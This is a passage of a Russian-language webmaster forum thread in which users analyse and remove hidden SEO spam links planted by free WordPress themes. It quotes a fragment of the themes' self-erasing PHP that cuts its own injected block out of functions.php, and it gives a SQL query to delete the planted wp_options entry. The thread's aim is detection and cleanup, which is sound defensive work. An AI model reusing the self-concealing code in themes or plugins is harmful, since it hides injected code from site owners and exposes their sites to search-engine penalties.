Помогите с wordpress. Сложный "вирус". Не могу удалить.

1 23
W
На сайте с 05.09.2011
Offline
7
#21
goliafz:
Код везде разный. Но с add_filter есть у всех.

Код не разный.

Просто та часть что я привел. Вырезается каждый раз, когда вызывается function.php. Загрузите шаблон , и не устанавливая его откройте function.php

//selfterminate
$functions = file_get_contents(TEMPLATEPATH.'/functions.php');
$p1 = substr($functions, 0, strpos($functions, '//beginXX'));
$p2 = end(explode('//endXX', $functions));
file_put_contents(TEMPLATEPATH.'/functions.php', $p1.$p2);

Та часть что вырезается. Центр управления ссылками (Насколько я понял):) Как я уже отметил. Задумка довольно интерестная.

Впринципе и не удивительно что вы ничего не заметили. если бы не eval....

з.ы Корень зла, тут :) http://wpru.ru

goliafz
На сайте с 16.07.2008
Offline
94
#22
wlaam:
Код не разный.

Просто та часть что я привел. Вырезается каждый раз, когда вызывается function.php. Загрузите шаблон , и не устанавливая его откройте function.php

У меня на разных шаблонах разный код кроме add_filter. Он есть в спамных шаблонах. Пока проверил 6 шаблонов, а точнее сами сайты на внешние ссылки с помощью линк инспектора. Хочу быть уверенным, что после удаления не будет лишних ссылок. :)

W
На сайте с 05.09.2011
Offline
7
#23
goliafz:
У меня на разных шаблонах разный код кроме add_filter

Не знаю что там на других шаблонах. Я вам привел принцип действия на этом. Может в других по другому..... хз.

Как-то попытайтесь понять что сразу после установки шаблона. Вы тот код что я привел не увидите. Он тупо удаляется.

Вам нужно заново скачать любой шаблон с того сайта. И НЕ УСТАНАВЛИВАЯ ЕГО, открыть function.php. Тогда все сами поймете.

Тяжко жжж однако бывает :) Сейчас спецом скачал еще 3 шаба. Везде одно и тоже.

goliafz
На сайте с 16.07.2008
Offline
94
#24
wlaam:
Не знаю что там на других шаблонах. Я вам привел принцип действия на этом. Может в других по другому..... хз.

Как-то попытайтесь понять что сразу после установки шаблона. Вы тот код что я привел не увидите. Он тупо удаляется.

Вам нужно заново скачать любой шаблон с того сайта. И НЕ УСТАНАВЛИВАЯ ЕГО, открыть function.php. Тогда все сами поймете.

Тяжко жжж однако бывает :) Сейчас спецом скачал еще 3 шаба. Везде одно и тоже.

А я сразу же и не устанавливаю шаблон. У меня он вначале оседает в папке с другими шаблонами. Просматривается, удаляется лишнее, а уж только потом закачивается :)

Но задумка у этих ребят просто очень классная. С одной стороны мне понравилась реализованная задумка. Так спрятать от обычного человека - это круто.

Если бы я был как все - я вряд ли вообще узнал об этом. Проблема в том, что я давно уже проверяю каждый сайт на внешние ссылки. И если бы я этого не делал линк инспектором, то и не знал бы об этих ссылках.

А сколько людей, скачавших такие шаблоны и не подозревающих о том, что на их сайтах куча внешних ссылок? Думаю много.

Ребята придумали супер метод продвижения своих сайтов абсолютно бесплатно. Аля маленькая сапа, но бесплатная :)

W
На сайте с 05.09.2011
Offline
7
#25

Кстати вы можете выполнить запрос через phpmyadmin

SELECT * FROM `wp_options` WHERE `option_name` = 'blogoption'

и просто удалить эту строку если ее найдет. Ссылки исчезнут. И function.php править не придется.

wlaam добавил 07.09.2011 в 06:35

goliafz:
Ребята придумали супер метод продвижения своих сайтов абсолютно бесплатно

Тема спалена.

з.ы Да и на всякий случай всеже советую удалить эту внедренную функцию из БД уже попавших сайтов. А то вдруг еще чего придумают :).

http://www.cmshelper.ru/skrytye-ssylki-vo-vsekh-shablonakh-s-sajjta-wordpresse-ru/

goliafz
На сайте с 16.07.2008
Offline
94
#26

Как и обещал - выкладываю отчет.

Итак, из 78 сайтов почти во всех шаблонах был "левый" код. Но не на всех сайтах появлялись скрытые ссылки.

Поэтому я приведу количество сайтов, на которых появились эти ссылки и общее количество ссылок.

Сайтов: 30

Скрытых ссылок: 213

Скрытых ссылок на 1 сайт (среднее значение): по 7 ссылок

Из-за таких ссылок сайт может спокойно уйти под АГС или его забанят, т.к. скрытые ссылки для яндекса - это спам. А за спам положены санкции.

Arowana
На сайте с 14.01.2009
Offline
44
#27

Спасибо ТС, такую же фигню нашёл у себя, шаблон уже не помню где брал, но помню что была ссылка скрытая в футере, ну убил и порядок.

Аваст начал ругаться на сайт сегодня, каспер, гугл и яндекс молчат.

Залез в код, а там по 10 ссылок на странице висят скрытые.

Вылечил по методе ТС.

U
На сайте с 02.07.2011
Offline
123
#28

Вам в помощь:

Как найти и удалить вирус с сайта wordpress:

Антивирус wordpress

Убить антивирус wordpress

Удалить malframe/ad с сайта wordpress

U
На сайте с 02.07.2011
Offline
123
#29

А потом решил все это объединить в одно маленькое чудо:

удалить вирус wordpress

1 23

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий